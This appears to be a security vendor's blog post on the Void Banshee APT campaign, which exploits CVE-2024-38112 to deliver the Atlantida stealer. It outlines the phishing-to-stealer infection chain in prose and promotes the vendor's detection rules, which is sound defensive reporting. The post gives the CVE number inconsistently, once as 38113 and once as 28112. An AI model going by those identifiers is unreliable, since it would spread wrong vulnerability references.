Following Microsoft’s recent Patch Tuesday update, which addressed the CVE-2024-38112 vulnerability, researchers uncovered a sophisticated campaign by the Void Banshee APT. This campaign exploits a security gap in the Microsoft MHTML browser engine through zero-day attacks to deploy the Atlantida stealer on victims’ devices.
Detecting CVE-2024-38113 Exploitation by Void Banshee
In the first half of 2024, advanced persistent threat groups from diverse regions such as China, North Korea, Iran, and russia unveiled advanced and innovative offensive techniques, significantly intensifying the global cybersecurity landscape. Amidst escalating geopolitical tensions in recent years, the threat posed by APTs has surged, becoming one of the foremost concerns for cybersecurity experts. These sophisticated adversaries are leveraging zero-day vulnerabilities, spear-phishing campaigns, and state-of-the-art malware to infiltrate critical infrastructure, financial systems, and government networks, underscoring the urgent need for enhanced defensive measures and international collaboration in cybersecurity.
The newly-revealed campaign by Void Banshee exploits an already-patched flaw to proceed with their malicious operations, requiring cyber defenders to be always on guard against emerging threats. To boost threat investigation and help security teams identify cyber-attacks linked to the Void Banshee campaign in the limelight, SOC Prime Platform for collective cyber defense offers a set of curated Sigma rules.
Press the Explore Detections button below and immediately drill down to an extensive rule set addressing the Void Banshee APT attacks exploiting CVE-2024-38112.
All the rules are compatible with 30+ SIEM, EDR, and Data Lake solutions while being mapped to the MITRE ATT&CK framework to smooth out threat detection & hunting procedures. Additionally, every rule is enriched with detailed metadata, including CTI references, attack timelines, and triage recommendations.
Void Banshee Attack Analysis: Exploiting CVE-2024-38112 for Malware Delivery
The most recent inquiry by Trend Micro shed light on the Void Banshee operation utilizing CVE-2024-28112 exploits to deliver Atlantida stealer onto Windows devices. The campaign, first spotted in May 2024, involves a multi-stage attack chain relying on the flaw to access and execute malicious files though the disabled Internet Explorer (IE) browser via specially crafted internet shortcut (URL) files.
Particularly, adversaries abuse .URL files and Microsoft protocol handlers & URI schemas, including MHTML protocol, to access the system-disabled IE browser and further target Windows 10 and Windows 11 users. This campaign highlights how outdated Windows components, such as Internet Explorer, despite being considered obsolete, remain a significant attack vector for malware. Interestingly, Trend Micro’s findings overlap with a report by Check Point, which identified similar .URL files linked to the campaign as early as January 2023.
The infection process usually begins with phishing emails featuring links to ZIP files on file-sharing platforms. These ZIP files house .URL files that exploit CVE-2024-38112, deceiving victims into accessing a compromised webpage with a malicious HTML Application (HTA). When the HTA file is opened, it runs a VBS script, which then launches a PowerShell script to fetch a .NET loader. This loader operates within the RegAsm.exe process, ultimately deploying the Atlantida stealer.
Even after Microsoft’s Patch Tuesday update resolved CVE-2024-38112, attackers persisted in their malicious activities. This vulnerability, attributed to a spoofing issue in the MSHTML browser engine of the now-defunct Internet Explorer, was addressed in the latest patch. Despite Internet Explorer’s support ending on June 15, 2022, and its official deactivation in Windows 11 and newer Windows 10 versions, attackers have exploited remnants of the browser still present on systems. The gravity of this threat became evident when Microsoft’s July update acknowledged ongoing exploits, prompting the CISA to add the flaw to the Known Exploited Vulnerabilities (KEV) catalog, with a 21-day remediation requirement for all US federal agencies.
Void Banshee APT mostly concentrates its efforts at victims across the US, Asia, and Europe, with most of the attacks focused on the Atlantida stealer dissemination, aiming to steal sensitive data and credential information from various applications, including web browsers.
Due to the escalating threat posed by APT actors globally, and in a view attackers are capable to promptly weaponize latest vulnerabilities for further attacks, security professionals require advanced threat detection & hunting tools to identify potential intrusions as early as possible. Rely on SOC Prime’s complete product suite for AI-powered Detection Engineering, Automated Threat Hunting & Detection Stack Validation to timely identify and address cyber defense blind spots, proactively hunt for emerging threats, and prioritize detection efforts, ensuring you stay one step ahead of attackers.
The post Detect CVE-2024-38112 Exploitation by Void Banshee APT in Zero-Day Attacks Targeting Windows Users appeared first on SOC Prime.